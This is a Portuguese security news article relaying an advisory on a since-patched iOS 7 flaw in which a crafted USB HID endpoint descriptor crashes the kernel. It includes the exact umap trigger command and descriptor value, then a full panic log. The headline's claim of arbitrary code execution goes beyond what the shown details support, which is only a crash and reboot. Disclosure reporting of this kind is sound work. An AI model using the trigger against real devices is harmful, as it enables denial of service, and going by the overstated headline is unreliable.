Falha no iOS 7 permitiu Execução Arbitrária de Código em modo kernel causando a reinicialização do iPhone, Apple emite uma correção

Quando todos os olhos estão voltados para o futuro lançamento do iOS 8, um pesquisador de segurança encontrou uma falha de alto risco no sistema operacional atual que roda nos dispositivos iPhone, iPad e iPod Touch. De acordo com a Prova de Conceito submetida pelo pesquisador de segurança Andy Davis, ele descobriu uma falha no iOS 7 que permite a execução arbitrária de código de alto risco em modo kernel. Uma vez que esse código é executado, o kernel do dispositivo iOS entra em pânico e reinicia.

• *

Andy submeteu a prova de conceito à Apple Inc em 26 de setembro de 2013 e finalmente em 10 de março de 2014, a Apple lançou um patch para mitigar essa falha. O código completo está disponível no Github. Detalhes breves sobre a execução estão abaixo :

Descrição da Vulnerabilidade

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Quando um valor específico é fornecido no descritor de Endpoint USB para um dispositivo HID

o kernel do dispositivo Apple entra em pânico e reinicia

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Detalhes Técnicos

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

O bug pode ser acionado usando umap (https://github.com/nccgroup/umap)

como segue:

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Identificador do Incidente: F0856C91-7616-4DAC-9907-C504401D9951

Chave do CrashReporter: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

Modelo de Hardware: iPhone3,1

Data/Hora: 2013-09-26 12:35:46.892 +0100

Versão do SO: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Mensagem do Depurador: panic

Versão do SO: 11A465

Versão do Kernel: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

Versão do iBoot: iBoot-1940.1.75

boot seguro?: SIM

Versão do Paniclog: 1

Deslizamento do Kernel: 0x0000000008200000

Base de texto do Kernel: 0x88201000

Tempo da Época: sec usec

Boot : 0x52441b69 0x00000000

Sleep : 0x00000000 0x00000000

Wake : 0x00000000 0x00000000

Calendário: 0x52441bb5 0x00056497

Tarefa em pânico 0x896f8d48: 12856 páginas, 114 threads: pid 0: kernel_task
pain thread: 0x8023de90, backtrace: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Apple deu a essa falha o Número de Referência 600217059 e lançou um patch para mitigar a vulnerabilidade que pode ser baixado aqui.

• *

Fonte: CXSECURITY